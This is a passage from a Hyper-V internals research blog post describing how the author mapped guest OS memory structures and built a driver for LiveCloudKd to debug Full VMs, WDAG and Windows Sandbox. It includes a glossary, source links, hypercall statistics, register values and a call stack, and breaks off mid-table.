<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols',sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WDAG – </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows Defender Application Guard;</span></div>
</div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols',sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Full VM (virtual machine)</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – virtual server, which was created in Hyper-V manager. Differs from WDAG container, Windows Sandbox, docker in Hyper-V isolation mode;</span></div>
</div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Root OS</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – operation system, where server part of Hyper-V is installed;</span></div>
</div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Guest OS</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – operation system, which works in Hyper-V emulation context, uses virtual devices, which is presented by Hyper-V infrastructure. It can be Full VM and Hyper-V containers;</span></div>
</div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">TLFS</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – Hypervisor Top-Level Functional Specification 5.0;</span></div>
</div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">GPA (guest physical address)</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – Guest OS physical memory address;</span></div>
</div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols',sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">SPA (system physical address)</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – Root OS physical memory address;</span></div>
</div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols',sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Hypercall</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – hypervisor service function, which is called by vmcall execution with specifying hypercall number;</span></div>
</div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: 'Noto Sans Symbols',sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 35.45pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">PFN </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">– page frame number.</span></div>
</div>
</li>
</ul>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Source of hvmm.sys driver on github.com:</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<a href="https://github.com/gerhart01/LiveCloudKd/tree/master/hvmm" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/LiveCloudKd/tree/master/hvmm</span></a></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Python-script for GPAR and MBlock objects parsing</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<div style="text-align: left;">
<a href="https://github.com/gerhart01/Hyper-V-Internals/blob/master/ParsePrtnStructure.py" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/Hyper-V-Internals/blob/master/ParsePrtnStructure.py</span></a></div>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Intro</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Long time ago I didn’t write anything in my blogpost. It doesn’t mean, that I stopped Hyper-V research. Since Microsoft issued WDAG in Windows 10, build 1803, I started investigate it, but got much problems. First, it was impossible to attach to container, because it doesn’t support it. WDAG is isolated environment, and bcdedit options for debugging can’t be configured. More then, every configuration option is reset after rebooting. Sysinternals LiveKD supports Hyper-V attaching, but compatibility was broken in latest OS versions, more then, guest OS memory reading hypercall HvReadGpa, which is used by LiveKd, is not compatible with containers. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It was stalemate, but it turned out, that Matt Suiche (@msuiche), founder of Comae Technologies, shared LiveCloudKd source code for me (many thanks to him!). That program allows attach WinDBG to guest OS, using vid.dll API for reading guest OS memory. But next problem is vid.dll execution blocked by Microsoft: functions from vid.dll can be executed only from vmwp.exe process context, otherwise it will be blocked by vid.sys driver, which compared _EPROCESS object of function’s usermode caller process with parent vmwp.exe _EPROCESS. Additionally, some of original LiveCloudKd techniques stopped working in Windows 10. I had to update it too. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Working on adaptation of LiveCloudKd can help me understand Hyper-V guest memory internals better. Soon Matt shared sources on github (</span><a href="https://github.com/comaeio/LiveCloudKd" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/comaeio/LiveCloudKd</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In 2017, Andrea Allievi made Hyper-V memory management architecture presentation (</span><a href="http://www.andrea-allievi.com/files/Recon_2017_Montreal_HyperV_public.pptx" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">www.andrea-allievi.com/files/Recon_2017_Montreal_HyperV_public.pptx</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">). Good work, but details were described quite abstractly, it was hard to match information from presentation to real vid.sys code. I believe it was because at the moment of presentation, Hyper-V symbols information has not yet been published. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Btw, thanks to Andrea to pointing me to some names of vid.sys structures.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Additionally, need say thanks to Microsoft company, which decided to publish symbols for many Hyper-V modules (</span><a href="https://docs.microsoft.com/en-us/virtualization/community/team-blog/2018/20180425-hyper-v-symbols-for-debugging" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://docs.microsoft.com/en-us/virtualization/community/team-blog/2018/20180425-hyper-v-symbols-for-debugging</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">). Without them it was hard to analyze memory-managed vid functions.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">First, I planned wrote article about Hyper-V containers, but I made research log above 150 pages (6 from 9 font), but still don’t understand whole working scheme. After that I decided to make a list of Hyper-V container components (then, it was extended to all Hyper-V components cheat sheet – no much files were need to add. Containers and Hyper-V has very similar components base).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 661px; overflow: hidden; width: 551px;"><img height="661" src="https://lh5.googleusercontent.com/5Dw1dIiDIcbjrZgE7f2V-19wyrd5Jk2c9SbYJfLT7Qjylty9oKkOrW4ak6uNzw6sIs4IefiYC97oaLr-vdpI3X7EcLBVJORixbhxuoO9QTTwZ0v0c3wJEmnTFkezTGMtfxFHWV4" style="margin-left: 0px; margin-top: 0px;" width="551" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After that, I understood, that it has much components and too big for 1 article description. Therefore, I decided to highlighted more interesting things in separate article about guest OS memory structures.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Why guest OS only? Hyper-V kernel hvix64.exe already has memory description in TLFS docs, and de facto it involved in memory operation only in allocation\deallocation stage. Read\write memory guest OS made independently of hypervisor. Yes, of course hypervisor make memory access attribution\isolates guest OS memory from root OS, and other OSes, but it made by hardware feature like EPT and don’t need evolve hypervisor on every memory reading\writing operation.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">I describe memory access to Full VM, WDAG, Windows Sandbox and shortly Docker containers. During research hvmm driver was created. Main function of it – provide interface for reading guest OS memory from root OS without access to vid.sys, hvix64.exe API. That driver was integrated to LiveCloudKd project.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Detailed description of Hyper-V internals we will see in part 2 of Windows Internals book, 7</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="font-size: 0.6em; vertical-align: super;">th</span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, writing by Andrea Allievi. But while book under develop, you can read shot description of Hyper-V guest OS memory structures in this article :)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Let’s beginning. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Direct memory access to Full VM and Hyper-V containers</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Vmwp.exe is the main process, that controls guest OS execution and provide device emulation. It is launched by vmcompute.exe, which is managed by vmms.exe for Full VM, hvsimgr.exe for WDAG, WindowsSanbox.exe for Windows Sandbox, docker.exe for docker containers. When starting, the vmwp.exe process accesses to the hypervisor interfaces (hypercalls) through the vid.dll interface. I got hypercall usage statistic for Windows Server 2019 VM, Docker container in Hyper-V isolation mode (nanoserver image: 1809) and WDAG container. The WDAG container generates too many hypercalls, so due some delays, caused by the debugger writing results, the container immediately started to turn off after being turned on (WDAG-manage application hvsimgr.exe controls execution timeouts of some procedures), and therefore the WDAG results contains summary indicator (I want to try dtrace, relatively recently developed under Windows, to collect such statistics - in theory, it should reduce the cost of recording the collected data and remove hvsimgr.exe timeout limitations). Separately there is recorded shutdown statistics, so that the approximate order can be estimated. In comparing to Full VM, it is quite large:</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 786px; overflow: hidden; width: 624px;"><img height="786" src="https://lh3.googleusercontent.com/ozosG1Lh1eyCXUEzOmNuVa-iG5CU5NEmzta2Nun_SsJKLQoWkAzRRlQ5Us-Dp2YZ58oRI45rfsZxpy3ZRuAygWeGzRpBnP-Po5bi4Rj-Dy3fEYr65wbPltnmioay0xWnsLRRX_c" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">What categories of hypercalls can be distinguished from this calling statistics? Partition creation, configuring its properties, creating virtual processors and virtual ports (use to send signals, messages), setting interceptions, and various hypercalls for memory management.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">See to winhvr.sys!WinHvMapGpaPagesFromMbpArrayScanLargePages function. Rdx contains page number, rsi - size (in pages).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When we start Windows Server 2019 with 1500 Mb of RAM, we got:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.449999999999996pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1st call rdx=0000000000000000 rsi=000000000005dc00 </span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.449999999999996pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2nd call rdx=00000000000f8000 rsi=0000000000000800 </span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.449999999999996pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3rd call rdx=0000000000fff800 rsi=0000000000000800</span></div>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When we start Windows Server 2019 with 2300 Mb of RAM, we got:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.449999999999996pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1st call: rdx=0000000000000000 rsi=000000000008fc00 </span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.449999999999996pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2nd call: rdx=00000000000f8000 rsi=0000000000000800 </span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.449999999999996pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3rd call: rdx=0000000000fff800 rsi=000000000000024a</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Call stack:</span></div>
<div align="left" dir="ltr" style="margin-left: -5.4pt;">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="283"></col><col width="283"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1st call</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2nd and 3rd calls</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 winhvr!WinHvMapGpaPagesFromMbpArrayScanLargePages</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 Vid!VsmmHvpMapGpasFromMbpArray</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 Vid!VsmmHvpMapGpasFromMemoryBlockRange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 Vid!VsmmHvMapGpasFromMemoryBlock</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 Vid!VsmmAdjustGpaSpaceForMemoryBlockRange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 Vid!VsmmCreateMemoryBlockGpaRange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 Vid!VidIoControlPartition</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 Vid!VidIoControlDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">08 Vid!VidIoControlPreProcess</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">…………………WDF Calls………………………………..</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
